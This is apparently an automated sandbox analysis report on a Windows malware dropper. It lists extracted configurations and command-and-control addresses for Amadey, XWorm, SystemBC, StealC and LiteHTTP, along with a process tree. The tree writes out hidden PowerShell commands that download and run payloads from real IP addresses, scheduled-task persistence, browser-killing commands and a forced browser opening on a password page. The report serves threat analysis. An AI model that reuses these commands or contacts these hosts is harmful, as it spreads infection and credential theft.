Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/03/2025, 23:06

General

  • Target

    06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe

  • Size

    938KB

  • MD5

    d8c7db0634dc3956c08f61096b6b8e9b

  • SHA1

    fc6c24b4fa8091514076611a49088bc087fc9f11

  • SHA256

    06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f

  • SHA512

    51476aff3a60b4d536285849a675c28e3ce87bbfbc1b5ad6def9099cb7c3a9645114c92b572f58939d5d774f25a3d7f24fa9c24107f68ee62385fee8e2f1a580

  • SSDEEP

    24576:1qDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:1TvC/MTQYxsWR7a0Q

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 23 IoCs
  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
    "C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2928
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2924
        • C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
          "C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
              "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2400
              • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2240
                • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
                  "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:600
            • C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
              "C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2484
            • C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
              "C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2072
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1896
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3036
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1900
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1516
                  • C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
                    "C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2392
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2836
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2984
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1548
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2396
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1772
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1724
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1236
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1460
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "f2QhvmaOIYD" /tr "mshta \"C:\Temp\GH8RmsOFg.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1912
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\GH8RmsOFg.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:1420
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3032
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:900
            • C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe
              "C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2144
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1420
            • C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
              "C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
              • C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
                "C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1688
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1028
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2884
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 508
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1156
            • C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe
              "C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2508
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1572
            • C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe
              "C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1780
            • C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe
              "C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2836
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2356
            • C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe
              "C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2664
            • C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe
              "C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2956
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1540
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2084
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:284
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1948
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2872
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                PID:332
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  8⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2176
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.1343690239\1625897888" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c58ad70-77ce-4714-a16d-718e2daf80da} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1288 110b7858 gpu
                    9⤵
                    PID:2636
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.694409263\743002394" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d366d0d-4de4-478b-ad16-c0a158ce176b} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1492 e74258 socket
                    9⤵
                    PID:1952
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.755936859\1884948793" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d284488-94dc-43c2-8703-eef4d499d07a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2068 19ea9358 tab
                    9⤵
                    PID:2932
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.668382452\2020364546" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ce6ca1-5ffc-4de3-ba77-71250d0d15d8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2924 e64858 tab
                    9⤵
                    PID:1772
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.957323284\231409263" -childID 3 -isForBrowser -prefsHandle 3804 -prefMapHandle 3812 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba4ef1ef-4c74-45c0-aa97-ba1ccee776fd} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3824 1fccb858 tab
                    9⤵
                    PID:316
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.972541004\640143421" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e0004a2-230c-4dfe-8201-712d705526be} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3940 1fcf4858 tab
                    9⤵
                    PID:2568
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1844910257\749227326" -childID 5 -isForBrowser -prefsHandle 4068 -prefMapHandle 3796 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44240c1-0e27-40ac-b4f5-3507ce3bf15a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4056 1fcf2458 tab
                    9⤵
                    PID:1388
            • C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe
              "C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3500
            • C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
              "C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3764
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1048
                7⤵
                • Loads dropped DLL
                • Program crash
                                PID:1828
                            • C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3868
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FEA.tmp\7FEB.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
                                7⤵
                                  PID:3900
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                                    8⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3928
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                                      9⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4016
                              • C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
                                "C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
